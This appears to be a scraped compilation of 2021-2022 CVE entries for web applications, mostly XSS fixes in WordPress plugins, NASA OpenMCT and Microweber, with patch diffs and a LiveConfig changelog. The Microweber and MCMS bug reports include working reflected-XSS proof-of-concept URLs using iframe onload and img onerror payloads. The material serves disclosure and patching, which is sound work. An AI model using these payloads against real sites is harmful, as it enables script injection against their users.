The GiveWP WordPress plugin before 2.17.3 does not escape the json parameter before outputting it back in an attribute in the Import admin dashboard, leading to a Reflected Cross-Site Scripting

CVE-2022-0252: Changeset 2659032 – WordPress Plugin Repository

The Translation Exchange WordPress plugin through 1.0.14 was vulnerable to Authenticated Stored Cross-Site Scripting (XSS) within the Project Key text field found in the plugin's settings.

CVE-2021-25057

The FeedWordPress plugin before 2022.0123 is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.

Timestamp:

01/23/2022 09:56:47 PM (5 weeks ago)

radgeek

Message:

Ver. 2022.0123 / small bug fixes and an IMPORTANT SECURITY FIX to a disclosed vulnerability based on malicious URLs in the admin interface; please upgrade ASAP.  

Location:

feedwordpress/trunk

Files:

  

*   feedwordpress.php (3 diffs)
*   feedwordpresssyndicationpage.class.php (8 diffs)
*   readme.txt (3 diffs)
*   syndicatedpost.class.php (6 diffs)

**Legend:**

Unmodified

Added

Removed

*   **feedwordpress/trunk/feedwordpress.php**
    
    r2563479
    
    r2662665
    
     
    
    4
    
    4
    
    Plugin URI: http://feedwordpress.radgeek.com/
    
    5
    
    5
    
    Description: simple and flexible Atom/RSS syndication for WordPress
    
    6
    
     
    
    Version: 2021.0713
    
     
    
    6
    
    Version: 2022.0123
    
    7
    
    7
    
    Author: C. Johnson
    
    8
    
    8
    
    Author URI: https://feedwordpress.radgeek.com/contact/
    
    …
    
    …
    
     
    
    12
    
    12
    
    /\*\*
    
    13
    
    13
    
     \* @package FeedWordPress
    
    14
    
     
    
     \* @version 2021.0713
    
     
    
    14
    
     \* @version 2022.0123
    
    15
    
    15
    
     \*/
    
    16
    
    16
    
    …
    
    …
    
     
    
    31
    
    31
    
    ####################################################################################
    
    32
    
    32
    
    33
    
     
    
    define ('FEEDWORDPRESS\_VERSION', '2021.0713');
    
     
    
    33
    
    define ('FEEDWORDPRESS\_VERSION', '2022.0123');
    
    34
    
    34
    
    define ('FEEDWORDPRESS\_AUTHOR\_CONTACT', 'http://feedwordpress.radgeek.com/contact');
    
    35
    
    35
    
*   **feedwordpress/trunk/feedwordpresssyndicationpage.class.php**
    
    r2563479
    
    r2662665
    
     
    
    58
    
    58
    
            endif;
    
    59
    
    59
    
           
    
     
    
    60
    
            // this may be output into HTML, and it should really only ever be Y or N...
    
    60
    
    61
    
            $visibility = (
    
    61
    
    62
    
                isset($\_REQUEST\['visibility'\])
    
    62
    
     
    
                ? $\_REQUEST\['visibility'\]
    
     
    
    63
    
                ? preg\_replace('/\[^YyNn\]+/', '', strip\_tags($\_REQUEST\['visibility'\]))
    
    63
    
    64
    
                : $defaultVisibility
    
    64
    
    65
    
            );
    
    65
    
    66
    
           
    
    66
    
     
    
            return $visibility;
    
     
    
    67
    
            return (strlen($visibility) > 0 ? $visibility : $defaultVisibility);
    
    67
    
    68
    
        } /\* FeedWordPressSyndicationPage::visibility\_toggle() \*/
    
    68
    
    69
    
    …
    
    …
    
     
    
    476
    
    477
    
           
    
    477
    
    478
    
            // Hey ho, let's go...
    
     
    
    479
    
            $syndicatedLinks\_formAction = esc\_url( sprintf('%s&amp;visibility=%s', $hrefPrefix, urlencode($visibility)) );
    
    478
    
    480
    
            ?>
    
    479
    
    481
    
            <div style="float: left; background: #F5F5F5; padding-top: 5px; padding-right: 5px;"><a href="<?php print $this->form\_action(); ?>"><img src="<?php print esc\_url(plugins\_url( "feedwordpress.png", \_\_FILE\_\_ ) ); ?>" alt="" /></a></div>
    
    …
    
    …
    
     
    
    528
    
    530
    
                <?php endif; ?>
    
    529
    
    531
    
           
    
    530
    
     
    
              <form id="syndicated-links" action="<?php print $hrefPrefix; ?>&amp;visibility=<?php print $visibility; ?>" method="post">
    
     
    
    532
    
              <form id="syndicated-links" action="<?php print $syndicatedLinks\_formAction; ?>" method="post">
    
    531
    
    533
    
              <div class="container"><?php FeedWordPressCompatibility::stamp\_nonce('feedwordpress\_feeds'); ?>
    
    532
    
    534
    
              <label for="add-uri">Add:
    
    …
    
    …
    
     
    
    552
    
    554
    
            $visibility = $this->visibility\_toggle();
    
    553
    
    555
    
            $showInactive = $this->show\_inactive();
    
    554
    
     
    
     
    
    556
    
           
    
    555
    
    557
    
            $hrefPrefix = $this->form\_action();
    
     
    
    558
    
            $formHref = esc\_url( sprintf( '%s&amp;visibility=%s', $hrefPrefix, urlencode($visibility) ) );
    
    556
    
    559
    
            ?>
    
    557
    
    560
    
            <div><?php FeedWordPressCompatibility::stamp\_nonce('feedwordpress\_feeds'); ?></div>
    
    …
    
    …
    
     
    
    559
    
    562
    
    560
    
    563
    
            <div id="add-multiple-uri" class="hide-if-js">
    
    561
    
     
    
            <form action="<?php print $hrefPrefix; ?>&amp;visibility=<?php print $visibility; ?>" method="post">
    
     
    
    564
    
            <form action="<?php print $formHref; ?>" method="post">
    
    562
    
    565
    
              <div><?php FeedWordPressCompatibility::stamp\_nonce('feedwordpress\_feeds'); ?></div>
    
    563
    
    566
    
              <h4>Add Multiple Sources</h4>
    
    …
    
    …
    
     
    
    578
    
    581
    
            computer.</p>
    
    579
    
    582
    
           
    
    580
    
     
    
            <form enctype="multipart/form-data" action="<?php print $hrefPrefix; ?>&amp;visibility=<?php print $visibility; ?>" method="post">
    
     
    
    583
    
            <form enctype="multipart/form-data" action="<?php print $formHref; ?>" method="post">
    
    581
    
    584
    
              <div><?php FeedWordPressCompatibility::stamp\_nonce('feedwordpress\_feeds'); ?><input type="hidden" name="MAX\_FILE\_SIZE" value="100000" /></div>
    
    582
    
    585
    
            <div style="clear: both"><label for="opml-lookup" style="float: left; width: 8.0em; margin-top: 5px;">From URL:</label> <input type="text" id="opml-lookup" name="opml\_lookup" value="OPML document" /></div>
    
    …
    
    …
    
     
    
    591
    
    594
    
       
    
    592
    
    595
    
            <div id="add-single-uri" class="alignright">
    
    593
    
     
    
              <form id="syndicated-links" action="<?php print $hrefPrefix; ?>&amp;visibility=<?php print $visibility; ?>" method="post">
    
     
    
    596
    
              <form id="syndicated-links" action="<?php print $formHref; ?>" method="post">
    
    594
    
    597
    
              <div><?php FeedWordPressCompatibility::stamp\_nonce('feedwordpress\_feeds'); ?></div>
    
    595
    
    598
    
              <ul class="subsubsub">
    
    …
    
    …
    
     
    
    619
    
    622
    
            </div> 
    
    620
    
    623
    
           
    
    621
    
     
    
            <form id="syndicated-links" action="<?php print $hrefPrefix; ?>&amp;visibility=<?php print $visibility; ?>" method="post">
    
     
    
    624
    
            <form id="syndicated-links" action="<?php print $formHref; ?>" method="post">
    
    622
    
    625
    
            <div><?php FeedWordPressCompatibility::stamp\_nonce('feedwordpress\_feeds'); ?></div>
    
    623
    
    626
    
           
    
*   **feedwordpress/trunk/readme.txt**
    
    r2563479
    
    r2662665
    
     
    
    4
    
    4
    
    Tags: syndication, aggregation, feed, atom, rss
    
    5
    
    5
    
    Requires at least: 4.5
    
    6
    
     
    
    Tested up to: 5.7.2
    
    7
    
     
    
    Stable tag: 2021.0713
    
     
    
    6
    
    Tested up to: 5.9
    
     
    
    7
    
    Stable tag: 2022.0123
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: https://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    65
    
    65
    
    66
    
    66
    
    \== Changelog ==
    
     
    
    67
    
     
    
    68
    
    \= 2022.0123 =
    
     
    
    69
    
     
    
    70
    
    \*   IMPORTANT SECURITY FIX: This version includes an important fix for a security vulnerability reported to me through WPScan and WordPress support channels.
    
     
    
    71
    
     
    
    72
    
        Vulnerability CVE-2021-25055 allowed for an XSS (Cross-Site Scripting) attack using a specially crafted URL for a page within the FeedWordPress admin interface. (To be exploited, an existing user with login credentials that allow them to access the FeedWordPress dashboard would have to follow the malicious URL and log in.) This vulnerability has been corrected in the current version; to protect your site's security PLEASE BE SURE TO UPGRADE AS SOON AS POSSIBLE to version 2022.0123 or later, via the WordPress Plugin Repository or via Github.
    
     
    
    73
    
     
    
    74
    
    \*   BUG FIXES: Fixes a number of small possible bugs when creating new syndicated posts under unusual conditions -- a sanity check is built in to avoid infinite loops in case of certain unexpected error outcomes when creating new users; some more possible sources of PHP 8 "Countable" warnings are eliminated, etc.
    
    67
    
    75
    
    68
    
    76
    
    \= 2021.0713 =
    
    …
    
    …
    
     
    
    166
    
    174
    
        The first is a common problem across several plugins due to an ambiguity in the WordPress documentation and a change in the behavior of WordPress's built-in add\_query\_arg() and remove\_query\_arg() functions which could, under certain low-probability conditions, allow for potential XSS attack vectors. This fixes issue # 39 reported at <https://github.com/radgeek/feedwordpress/issues/39> Thanks to github.com/quassy
    
    167
    
    175
    
       
    
    168
    
     
    
        The second is a security vulnerability fixes a security vulnerability that was reported to me privately (thanks to Adrián M. F.) which, under other low-probability conditions, could allow for SQL insertion attacks by a malicious user with access to login credentials, which would compromise data security.
    
     
    
    176
    
        The second fixes a security vulnerability that was reported to me privately (thanks to Adrián M. F.) which, under other low-probability conditions, could allow for SQL insertion attacks by a malicious user with access to login credentials, which would compromise data security.
    
    169
    
    177
    
    170
    
    178
    
        It is \*IMPORTANT\* and worth your while to upgrade FeedWordPress as soon as possible in order to eliminate these vulnerabilities. If you have any questions or if there is something blocking you from making the upgrade which you need my help with, don't hesitate to get in touch.
    
*   **feedwordpress/trunk/syndicatedpost.class.php**
    
    r2364449
    
    r2662665
    
     
    
    699
    
    699
    
                    $link = $this->permalink();
    
    700
    
    700
    
                    if (is\_null($link)) : $link = $this->link->uri(); endif;
    
    701
    
     
    
                    $guid .= '://'.md5($link.'/'.$this->item\['title'\]);
    
     
    
    701
    
                    $guid .= '://'.md5($link.'/'.$this->title());
    
    702
    
    702
    
                endif;
    
    703
    
    703
    
            endif;
    
    …
    
    …
    
     
    
    1332
    
    1332
    
                        $frozen = ('yes' == $this->link->setting('freeze updates', 'freeze\_updates', NULL));
    
    1333
    
    1333
    
                        if (!$frozen) :
    
    1334
    
     
    
                            $frozen\_values = get\_post\_custom\_values('\_syndication\_freeze\_updates', $old\_post->ID);
    
    1335
    
     
    
                            $frozen = (count($frozen\_values) > 0 and 'yes' == $frozen\_values\[0\]);
    
     
    
    1334
    
                            $frozen\_value = get\_post\_meta($old\_post->ID, '\_syndication\_freeze\_updates', /\*single=\*/ true);
    
     
    
    1335
    
                            $frozen = (!is\_null($frozen\_value) and ('yes' == $frozen\_value));
    
    1336
    
    1336
    
    1337
    
    1337
    
                            if ($frozen) :
    
    …
    
    …
    
     
    
    2340
    
    2340
    
                        #-- loop. Keep trying to add the user until you get it
    
    2341
    
    2341
    
                        #-- right. Or until PHP crashes, I guess.
    
     
    
    2342
    
                        $insanity = 0;
    
    2342
    
    2343
    
                        do {
    
    2343
    
    2344
    
                            $id = wp\_insert\_user($userdata);
    
    …
    
    …
    
     
    
    2347
    
    2348
    
                                case 'empty\_user\_login' :
    
    2348
    
    2349
    
                                case 'existing\_user\_login' :
    
     
    
    2350
    
                                case 'invalid\_username' :
    
    2349
    
    2351
    
                                    // Add a random disambiguator
    
    2350
    
    2352
    
                                    $userdata\['user\_login'\] .= substr(md5(uniqid(microtime())), 0, 6);
    
     
    
    2353
    
                                    break;
    
     
    
    2354
    
                                case 'user\_login\_too\_long' :
    
     
    
    2355
    
                                    // Limit length to 53 characters; if we end up needing a random disambiguator,
    
     
    
    2356
    
                                    // we should still have space to add it.
    
     
    
    2357
    
                                    $userdata\['user\_login'\] = mb\_substr( $userdata\['user\_login'\], 0, 53 );
    
    2351
    
    2358
    
                                    break;
    
    2352
    
    2359
    
                                case 'user\_nicename\_too\_long' :
    
    …
    
    …
    
     
    
    2364
    
    2371
    
                                    $userdata\['user\_email'\] = $parts\[0\].'@'.$parts\[1\];
    
    2365
    
    2372
    
                                    break;
    
     
    
    2373
    
                                default :
    
     
    
    2374
    
                                    if ( $insanity > 10 ) :
    
     
    
    2375
    
                                        // Try some settings that are unlikely to cause complaint...
    
     
    
    2376
    
                                        $url = parse\_url($hostUrl);
    
     
    
    2377
    
     
    
    2378
    
                                        $userdata\['user\_login'\] = substr(md5(uniqid(microtime())), 0, 6);
    
     
    
    2379
    
                                        $userdata\['user\_nicename'\] = $userdata\['user\_login'\];
    
     
    
    2380
    
                                        $userdata\['user\_email'\] = 'noreply@' . $url\['host'\];
    
     
    
    2381
    
                                    elseif ( $insanity > 50 ) :
    
     
    
    2382
    
                                        // Stop doing the same thing and expecting a different result
    
     
    
    2383
    
                                        break;
    
     
    
    2384
    
                                    endif;
    
    2366
    
    2385
    
                                endswitch;
    
    2367
    
    2386
    
                            endif;
    
     
    
    2387
    
                            $insanity = $insanity + 1;
    
    2368
    
    2388
    
                        } while (is\_wp\_error($id));
    
    2369
    
    2389
    
    …
    
    …
    
     
    
    2373
    
    2393
    
                        // suggestion of @boonebgorges, in case we need to process,
    
    2374
    
    2394
    
                        // winnow, filter, or merge syndicated author accounts, &c.
    
    2375
    
     
    
                        add\_user\_meta($id, 'feedwordpress\_generated', 1);
    
    2376
    
     
    
     
    
    2395
    
                        if (!is\_wp\_error($id)) :
    
     
    
    2396
    
                            add\_user\_meta($id, 'feedwordpress\_generated', 1);
    
     
    
    2397
    
                        else :
    
     
    
    2398
    
                            $id = null;
    
     
    
    2399
    
                        endif;
    
     
    
    2400
    
                       
    
    2377
    
    2401
    
                    elseif (is\_numeric($unfamiliar\_author) and get\_userdata((int) $unfamiliar\_author)) :
    
    2378
    
    2402
    
                        $id = (int) $unfamiliar\_author;
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2021-25055: Changeset 2662665 – WordPress Plugin Repository

Openmct versions 1.3.0 to 1.7.7 are vulnerable against stored XSS via the â€œSummary Widgetâ€? element, that allows the injection of malicious JavaScript into the â€˜URLâ€™ field.

This issue affects:
nasa openmct 
1.7.7 version  and prior versions;
1.3.0 version  and later versions.

Permalink

Browse files

Add back urlDefined and remove null checks

*   Loading branch information

![@khalidadil](https://avatars.githubusercontent.com/u/2343076?s=40&v=4)

1 parent a9daee1 commit abc93d0ec4b104dac1ea5f8a615d06e3ab78934a

@@ -42,14 +42,11 @@ export default {

};

},

computed: {

urlDefined() {

return this.internalDomainObject.url && this.internalDomainObject.url.length \> 0;

},

url() {

const urlDefined \= this.internalDomainObject.url && this.internalDomainObject.url.length \> 0;

let url \= urlDefined ? this.internalDomainObject.url : null;

if (url) {

url \= sanitizeUrl(url);

}

return url;

return this.urlDefined ? sanitizeUrl(this.internalDomainObject.url) : null;

}

},

mounted() {

@@ -48,12 +48,7 @@ export default {

return true;

},

url() {

let url \= this.domainObject.url;

if (url) {

url \= sanitizeUrl(url);

}

return url;

return sanitizeUrl(this.domainObject.url);

}

}

};

@@ -116,9 +116,7 @@ define(\[

\*/

SummaryWidget.prototype.addHyperlink \= function (url, openNewTab) {

if (url) {

const sanitizeUrl \= urlSanitizeLib.sanitizeUrl;

url \= sanitizeUrl(url);

this.widgetButton.attr('href', url);

this.widgetButton.attr('href', urlSanitizeLib.sanitizeUrl(url));

} else {

this.widgetButton.removeAttr('href');

}

@@ -39,9 +39,7 @@ define(\[

  

let url \= this.domainObject.url;

if (url) {

const sanitizeUrl \= urlSanitizeLib.sanitizeUrl;

url \= sanitizeUrl(url);

this.widget.setAttribute('href', url);

this.widget.setAttribute('href', urlSanitizeLib.sanitizeUrl(url));

} else {

this.widget.removeAttribute('href');

}

@@ -16,12 +16,7 @@ export default {

},

computed: {

url() {

let url \= this.currentDomainObject.url;

if (url) {

url \= sanitizeUrl(url);

}

return url;

return sanitizeUrl(this.currentDomainObject.url);

}

}

};

**0 comments on commit `abc93d0`**

Please sign in to comment.

CVE-2022-23054: Add back urlDefined and remove null checks · nasa/openmct@abc93d0

Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.

Permalink

Browse files

update

*   Loading branch information

![@peter-mw](https://avatars.githubusercontent.com/u/5698247?s=40&v=4)

1 parent c3c25ae commit f7f5d41ba1a08ceed37c00d5f70a3f48b272e9f2

@@ -36,7 +36,7 @@ public function create() {

public function edit(Request $request, $id) {

  

return $this\->view('content::admin.content.edit', \[

'content\_id'\=>$id

'content\_id'\=>intval($id)

\]);

}

}

@@ -32,7 +32,7 @@ public function create() {

public function edit(Request $request, $id) {

  

return $this\->view('page::admin.page.edit', \[

'content\_id'\=>$id

'content\_id'\=>intval($id)

\]);

}

}

@@ -34,7 +34,7 @@ public function create() {

public function edit(Request $request, $id) {

  

return $this\->view('post::admin.posts.edit', \[

'content\_id'\=>$id

'content\_id'\=>intval($id)

\]);

}

}

@@ -32,7 +32,7 @@ public function create() {

public function edit(Request $request, $id) {

  

return $this\->view('product::admin.product.edit', \[

'content\_id'\=>$id

'content\_id'\=>intval($id)

\]);

}

}

**0 comments on commit `f7f5d41`**

Please sign in to comment.

CVE-2022-0690: update · microweber/microweber@f7f5d41

WikiDocs version 0.1.18 has multiple reflected XSS vulnerabilities on different pages.

_menu_

Wiki|Docs

_print_ _lock\_open_

**Wiki|Docs**

This is a demo playground!

Authentication code is: **demo**

Contents will be reset hourly.

This page was last edited on 2022-02-19 16:00

Powered by Wiki|Docs

This page was last edited on 2022-02-19 16:00

**Nobody | WikiDocs.it**  
Copyright 2019 © All rigths reserved.

Powered by Wiki|Docs

CVE-2022-23376: Wiki|Docs

Valid

Reported on

Feb 18th 2022

**Description**

Can escape the `meta` tag because the user doesn't escape the double-quote in the `$redirectUrl` parameter when logging out.

**Proof of Concept**

    https://<server>/demo/api/logout?redirect_to=/asdf"><iframe onload=alert(document.domain)>
    

**Impact**

Through this vulnerability, an attacker is capable to execute malicious scripts.

CVE-2022-0678: Cross-site Scripting (XSS) - Reflected in microweber

SAS Web Report Studio 4.4 allows XSS. /SASWebReportStudio/logonAndRender.do has two parameters: saspfs_request_backlabel_list and saspfs_request_backurl_list. The first one affects the content of the button placed in the top left. The second affects the page to which the user is directed after pressing the button, e.g., a malicious web page. In addition, the second parameter executes JavaScript, which means XSS is possible by adding a javascript: URL.

CVE-2022-25256

A Path Traversal vulnerability for a log file in LiveConfig 2.12.2 allows authenticated attackers to read files on the underlying server.

**Changes in version 2.13.1 (01/30/2022):**

*   fixed wrong table order in MySQL schema (table `APIKEYS` couldn’t be created)
*   implemented rate limit for dynamic DNS updates (default: 15 updates per 10 minutes, configurable via LCDefaults key `dns.updateLimit`)
*   create `/etc/ssl/chains` if not existing on initial Apache configuration
*   updated Expat library to v2.4.4

**Changes in version 2.13.0 (10/15/2021):**

*   improved usability for “Delete Mailbox” button (prevent unintended deletion of mailbox)
*   preparing for rate limiting Dynamic DNS updates
*   security fix (file access - low impact level)
*   security fix (stored XSS within own customer data, low impact level)
*   updated Site.pro module
*   IP addresses can optionally be added only to web server vHost config, but not to DNS
*   Debian/Ubuntu: moving intermediate certificate files from `/etc/ssl/certs/*-ca.crt` to `/etc/ssl/chains/*-ca.crt`, adjusting Apache and ProFTPD configuration and running `c_rehash` (workaround for local OpenSSL validation problem/bug with Let’s-Encrypt “R3” certificate, see blog post)
*   disabling of SSH accounts did not work when using private key authentication
*   fixed warning regarding missing systemd-reload after update
*   fixed bug in Let’s Encrypt module when finalization has failed and is in “processing” state
*   DNS updates got stuck in a loop when multiple large IP groups where updated within a short interval

**Changes in version 2.12.2 (08/25/2021):**

*   allow disabling default MX records when setting custom MX records
*   improved detection of CentOS Stream 8
*   updated OpenSSL to 1.1.1l
*   differing MX was not used when adding a new domain

**Changes in version 2.12.1 (08/11/2021):**

*   improved displaying MX records and SMTP server name
*   autoresponder status wasn’t displayed in mailbox list

**Changes in version 2.12.0 (07/29/2021):**

*   allow configuration of PHP FPM pool settings (e.g. `pm.max_children`) via php.ini management
*   allow configuration of differing MX records for Postfix
*   edit mailbox: added “info” tab with all mailbox settings at a glance
*   support for Debian 11 (“Bullseye”)
*   support for CentOS Stream 8
*   log SASL user name in lcpolicyd when rejecting e-mails
*   improved security of password protection when using NGINX as reverse proxy for Apache
*   also removing `/var/tmp` from `open_basedir` in php.ini when running PHP via FPM
*   show subscription comment also to end-users (in webspace overview) to better differentiate between multiple subscriptions
*   prepared new licensing features
*   improved compatibility of Autodiscover feature with Microsoft Outlook Connectivity Test
*   support deletion of dynamic DNS records (A or AAAA)
*   connection to MySQL now also possible via IP (instead of only UNIX socket)
*   fixed timing problem when updating Postfix map files (could lead to deadlock under certain conditions)
*   Postfix `sender_bcc`/`recipient_bcc` also contained addresses without destination address
*   updating the validity period of SSL intermediate certificates if this is missing
*   fixed bug when allowing external database access for existing databases

**Changes in version 2.11.3 (04/06/2021):**

*   allow configuration of a default SPF record (if no custom SPF record is defined for a domain)
*   changed default location of most .pid files from `/var/run/` to `/run/` on Debian/Ubuntu
*   supporting installation with mod\_php and without php-cgi
*   allow disabling creation of catch-all e-mail addresses (existing catch-all addresses can still be managed)
*   updated OpenSSL to 1.1.1k
*   allowing UTF symbols (e.g. emojis) in domain names
*   disabling sql\_mode _ONLY\_FULL\_GROUP\_BY_ when using MySQL/MariaDB as backend database for LiveConfig
*   when adding/deleting directly managed secondary DNS servers from DNS templates, the `zones.liveconfig` file sometimes not was updated
*   DNSSEC keys where removed under certain conditions when DNS templates where modified
*   fixed expiry date of intermediate SSL certificates (some certificate chains where shown as being expired)

**Changes in version 2.11.2 (02/22/2021):**

*   fixed bug in PHP version list (list was empty in some cases)

**Changes in version 2.11.1 (02/22/2021):**

*   updated OpenSSL, Unbound and cURL libraries
*   restricted PHP versions are marked in overview list
*   disabled reverse DNS lookups in ProFTPD (configuration needs to be refreshed)
*   checking BCC destinations against forward domains blacklist
*   number of subdomains using the default PHP version was not counted correctly
*   fixed several missing translations

**Changes in version 2.11.0 (02/16/2021):**

*   usage of outdated PHP versions can now be restricted
*   a copy of all incoming and outbound e-mails can now be sent via BCC to another address (e.g. for e-mail archiving)
*   added SOAP method `CustomerDelete()`
*   a comment can now be added to subscriptions (to better differentiate between several subscriptions)
*   ignore errors when LogRotate `postrotate` command fails
*   improved error handling when PHP-FPM is not installed and a subscription was configured with PHP-FPM
*   rejecting e-mails to local accounts, except those listed in `/etc/aliases`
*   show message when OpenDKIM wasn’t found
*   increased maximum password length for `HostingMailboxAdd/Edit()` to 200 chars
*   private log files are now also rotated even if the user has exceeded his filesystem quota
*   suPHP option is not available any more for new hosting plans & subscriptions (suPHP is deprecated and will not be supported in the future)
*   option “skip DNS check” was ignored when adding a new SSL certificate (worked only when editing existing SSL jobs)
*   fixed bug in detection of PHP 7.4 FPM on Ubuntu 20
*   number of subdomains using the default PHP version was not counted correctly
*   fixed bug in `UsageStats` (`HostingSubscriptionGet()`) - data was returned in bytes/kB instead of MB

**Changes in version 2.10.4 (11/13/2020):**

*   replaced `%h` with `%a` in Apache LogFormat
*   userprefs path for SpamAssassin now is always created when spam filter is enabled for a mailbox (allows using the Bayes filter)
*   fixed JavaScript escaping (affected some popup windows on French interface)
*   don’t use system skeleton directory when creating users on CentOS/RHEL

**Changes in version 2.10.3 (11/05/2020):**

*   fixed bug when changing database password on MariaDB 10.1.x
*   also display installed but unused PHP versions at Server Management -> Web
*   fixed bug in login informations popup (when no language was configured for the receiving user)

**Changes in version 2.10.2 (10/30/2020):**

*   support enabling DNSSEC when adding domain via SOAP API
*   show end-of-life (EOL) date and comments in PHP version select dropdown
*   edit comments and EOL dates of PHP versions (Server Management -> Web)
*   domains/subdomains added via SOAP API are now displayed in “default view” by default
*   when a subscription is deleted, all assigned SSL certificates are now automatically deleted too
*   e-mail with login informations is now prepared in language of recipient
*   user language can be selected when adding a customer or editing a user
*   Webspace overview doesn’t show the host ID any more, but the server name (hostname)
*   server description is now displayed in server selection dropdown (when creating a new subscription)
*   permissions of directories created with `LC.fs.mkdir_rec` were too restrictive
*   support MySQL “authentication\_string” authorization with upgraded databases
*   displayed wrong size of DNSSEC keys (factor 8)
*   fixed HTML escaping of translated phrases
*   when disabling a user, active sessions are immediately closed

**Changes in version 2.10.1 (09/17/2020):**

*   some configuration files where created with wrong permissions (error in v2.10.0)

**Changes in version 2.10.0 (09/16/2020):**

*   allow wildcard domains (e.g. `*.example.org` or even `*.tld`) for e-mail blacklists/whitelists
*   SOAP method `HostingMailboxGet()` added (returns configuration of an e-mail address)
*   use `/var/www/.skel` (if existing) as so-called “skeleton directory” when adding new webspace accounts
*   support global configuration overrides for PHP FPM pools (Lua table `LC.web.FPMCONFIG`)
*   checking expire date of intermediate (chain) SSL/TLS certificates
*   full support for CentOS 8
*   full support for Ubuntu 20.04 LTS
*   IFRAME-API: added `toTop()` javascript function to scroll to top of page from within IFRAME content
*   supporting openSUSE 15.1
*   SOAP method HostingSubscriptionGet() now also returns a list of all configured e-mail addresses
*   prepared for repository GPG key rollover (key id: D409AC6D65FE6664)
*   supporting domain-specific Apache configuration includes also with proxy destinations
*   updated OpenSSL to v1.1.1g
*   supporting new privilege system on MariaDB 10.4
*   changed default mailbox home directory from `/var/mail` to `/var/mail/%C/%I` (fixes problem with repeated mails from autoresponder)
*   improved MySQL authentication to work with MySQL 8.x
*   support _auth\_socket_ authentication (without password) for MySQL root user
*   iOS mobileconfig supports multiple mailboxes within same domain on same device
*   iOS mobileconfig supports disabling IMAPS/POP3S (port 993/995)
*   added _autocomplete_ attributes to password fields for better usability
*   minor CSS improvements
*   improved NGINX vHost configuration for web statistics
*   improved NGINX reverse proxy configuration
*   SOAP method HostingSubscriptionGet() now also returns configured PHP version per subdomain as well as usage data of the subscription (UsageStats)
*   increased limit for php.ini settings (text) from 512 to 4096 byte
*   changed default setting for php.ini setting `opcache.file_cache` from `%HOME%/tmp` to "” (empty string), effectively disabling file cache by default
*   added `%PHP%` placeholder in php.ini settings (allows option `opcache.file_cache` to be set per PHP version, e.g. `%HOME%/.cache/opcache.%PHP%`)
*   fixed wrong password limit when enabling/modifying OTP configuration
*   fixed minor bug when searching for full mail address in list of mailboxes
*   domain was not removed from Postfix’ `recipient_access` file when locked subscription was deleted
*   fixed bug when creating additional ftp accounts using `HostingFtpAdd()` (affected version 2.9.x)
*   fixed bug resetting shell to `nologin` when reseller has edited an existing hosting plan
*   fixed problem in ACMEv2 client when using e.g. Buypass CA
*   .htpasswd file for web statistics was not generated when using only NGINX
*   disabling TLS1/TLS1.1 was ignored with NGINX
*   SSL cipher selection (default/strong) wasn’t applied to NGINX vHosts
*   fixed bug when changing password on MySQL 8.x

**Changes in version 2.9.3 (03/03/2020):**

*   fixed problem regarding Let’s Encrypt update when MySQL was being used as backend database

**Changes in version 2.9.2 (03/03/2020):**

*   allow downloading list of SSL certificates as CSV file
*   added option to disable TLSv1/TLSv1.1 per IP group for web server
*   added SOAP methods `HostingDCVCreate()`/`HostingDCVDelete()`
*   improved systemd configuration of liveconfig/lcclient
*   ACMEv2: some fixes to work with Let’s Encrypt Staging API
*   automated renewal of SSL certificates from Let’s Encrypt affected by their “CAA rechecking bug”
*   lcphp: `PHP_BINARY` environment variable got lost
*   SAN domains were ignored in SSL orders (v2.9.x)

**Changes in version 2.9.1 (12/13/2019):**

*   SSL certificates: added filter option “only own certificates”
*   salutation (contact data) can now be left empty
*   table search string wasn’t saved during page refresh
*   fixed display of version number in “Servers” report
*   fixed bug (missing permissions) when adding a FTP user as an additional LiveConfig user
*   fixed missing permission check when editing domains at “my hosting” as additional LiveConfig user
*   comparing `HC_REFRESHCFG` with version number (revision number not available any more)
*   fixed bug in quota check when editing mailboxes

**Changes in version 2.9.0 (11/29/2019):**

*   Let’s Encrypt: retry domain validation after HTTP errors (eg. timeout with Let’s Encrypt API) every 15 minutes
*   the DNS checks for automated SSL/TLS certificates can now be individually skipped (e.g. when using a CDN)
*   when private IPv4 addresses are used (without corresponding IP\_NAT data) then the DNS checks for Let’s Encrypt are automatically skipped
*   it’s now possible to change the PHP CLI used by the Application Installer (using Lua variable `LC.web.PHPCLI`)
*   automatic configuation of automated SSL certificates can now optionally be disabled (using checkboxes in order form)
*   allow binding Postfix only to localhost (127.0.0.1)
*   when an additional admin user adds a new server, he now automatically gets all permissions for that server
*   when a domain is deleted, optionally all assigned SSL certificates can be deleted too
*   improved detection of matching wildcard SSL certificates when configuring subdomains
*   list of SSL certificates can now be filtered (expired, unassigned, …)
*   mass mails aren’t sent to suspended customers any more (can be enabled via checkbox)
*   overview of SSL jobs (start page) doesn’t show entries of suspended customers any more
*   allow editing e-mail addresses of Let’s Encrypt accounts
*   display HTTPS links in AppInstaller if domain is configured with SSL
*   AppInstaller: uninstall sometimes failed when directory of application didn’t yet exist or was already deleted before uninstall
*   deleting a domain with existing mailboxes as reseller sometimes returned an error (missing permissions)
*   end users with hosting plans created via GUI didn’t have the permission to view the LiveConfig event log
*   fixed display error when editing a subdomain while parent domain has “(+www)” configuration enabled, preferring the “.www” subdomain
*   fixed bug when merging www/non-www subdomains if they were configured as redirect
*   don’t allow to automatically order SSL certificate when adding a new domain if user has no SSL management permissions
*   fixed bug when adding an automated SSL certificate with automatic HTTPS redirect (non-webspace targets where configured incorrectly)
*   fixed bug when configuring FPM with default PHP on CentOS (wrong directory for pool configuration)
*   lcsam: removed duplicate line breaks in X-Spam-Report

**Archive**

*   Changelog for version 2.0-2.8
*   Changelog for version 1.x

CVE-2021-40841: Changelog

MCMS v5.2.4 was discovered to contain an arbitrary file deletion vulnerability via the component /template/unzip.do.

An open source CMS Project,https://github.com/ming-soft/MCMS

the MCMS vulnerabilities include

*   Reflect XSS
*   Unauthorized file upload
*   Authorized file delete

**Reproduce****XSS**

path `/ms/template/unzip.do` exist reflect xss

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674036583-2021-12-2814:47:16.png)

**payload**

1  

/ms/template/unZip.do?fileUrl=%3C/p%3E%3Cimg%20src=x%20onerror=alert(%27hacking%27)%3E  

Authorized file uploads exist

path `/ms/file/uploadTemplate.do`

